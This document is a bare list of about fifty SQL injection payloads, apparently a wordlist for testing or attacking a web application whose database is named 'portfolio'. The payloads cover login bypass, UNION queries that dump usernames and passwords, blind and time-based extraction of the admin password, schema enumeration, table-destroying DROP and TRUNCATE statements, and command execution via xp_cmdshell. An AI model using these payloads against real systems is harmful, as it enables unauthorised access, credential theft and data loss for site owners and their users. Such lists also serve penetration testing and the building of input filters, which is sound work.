' OR 1=1--
' OR 'a'='a
' OR 1=1# 
' OR 1=1/*
' UNION SELECT NULL, NULL--
' UNION SELECT NULL, username, password FROM users--
' UNION SELECT 1,2,3--
' OR EXISTS(SELECT * FROM users WHERE username='admin' AND password='password')--
' AND 1=1--
' AND 1=2--
' OR 1=1-- -
' OR 'x'='x
' OR '1'='1
' OR 1=1 LIMIT 1,1--
' AND 1=1--
' AND '1'='1'--
' OR (SELECT COUNT(*) FROM users) > 0--
' AND (SELECT COUNT(*) FROM users) > 0--
' OR 1=1 AND SLEEP(5)--
' AND 1=1 AND SLEEP(5)--
' UNION SELECT username, password FROM users--
' UNION SELECT 1,2,3,4,5,6 FROM information_schema.tables--
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'), 1, 1)) > 100--
' AND (SELECT length(password) FROM users WHERE username='admin') = 8--
' AND (SELECT substring(password,1,1) FROM users WHERE username='admin') = 'a'--
' OR 1=1; DROP TABLE users--
' OR 1=1;-- DROP TABLE users
' OR 1=1; TRUNCATE TABLE users--
' AND (SELECT database()) = 'portfolio'--
' AND (SELECT table_name FROM information_schema.tables WHERE table_schema='portfolio') = 'users'--
' AND (SELECT column_name FROM information_schema.columns WHERE table_name='users') = 'username'--
' OR 'a'='a' AND (SELECT table_name FROM information_schema.tables) LIKE 'users%'--
' OR 'a'='a' AND (SELECT column_name FROM information_schema.columns WHERE table_name='users') LIKE 'username%'--
' AND 1=1 ORDER BY 1--
' AND 1=2 ORDER BY 1--
' UNION SELECT 1, username, password FROM users--
' AND (SELECT count(*) FROM users WHERE username='admin') > 0--
' AND 1=1 UNION SELECT null, null, null--
' OR (SELECT name FROM users WHERE username='admin')='admin'--
' AND (SELECT COUNT(*) FROM users WHERE username='admin') > 1--
' AND (SELECT * FROM users WHERE username='admin')='admin'--
' OR '1'='1' AND (SELECT database())='portfolio'--
' OR 'a'='a' AND (SELECT COUNT(*) FROM users) > 0--
' AND (SELECT COUNT(*) FROM users WHERE username='admin')=0--
' AND (SELECT length(password) FROM users WHERE username='admin') > 5--
' UNION ALL SELECT null, null, null--
' UNION ALL SELECT username, password FROM users--
' OR 1=1; EXEC xp_cmdshell('dir')--
' AND (SELECT user()) = 'root'--
' AND (SELECT version()) = 'MySQL 5.7.34'--
